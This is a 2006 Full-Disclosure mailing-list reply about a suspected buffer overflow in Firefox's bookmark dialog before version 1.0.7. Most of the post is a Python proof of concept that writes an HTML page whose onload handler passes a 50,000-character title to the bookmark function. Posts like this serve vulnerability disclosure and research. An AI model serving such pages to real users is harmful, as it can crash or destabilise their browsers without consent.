[Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]
- From: casiamo <casiamo@xxxxxxxxx>
- Date: Mon, 2 Jan 2006 17:09:51 +0100
Hello Sumit,
I saw this some time ago too, and as far as I know the below code would do
the same with the versions below 1.0.7. As I remember, all input fields were
"vulnerable". I have chosen the bookmark "name" field, which will pop up
after loading with a long buffer.
# Writes firefox.html; on load the page calls bookmarksite() with a
# 50000-character title, so the bookmark dialog opens with that long name.
html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
           "<script type=\"text/javascript\">\n"
           "function bookmarksite(title, url){\n"
           "if (document.all)\n"
           "window.external.AddFavorite(url, title);\n"
           "else if (window.sidebar)\n"
           "window.sidebar.addPanel(title, url, \"\")}\n"
           "</script></head>\n"
           "<body onload=\"javascript:bookmarksite('" + buff + "', 'http://www.mozilla.org')\">\n"
           "</body></html>")
html.close()
Regards,
Casiamo
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/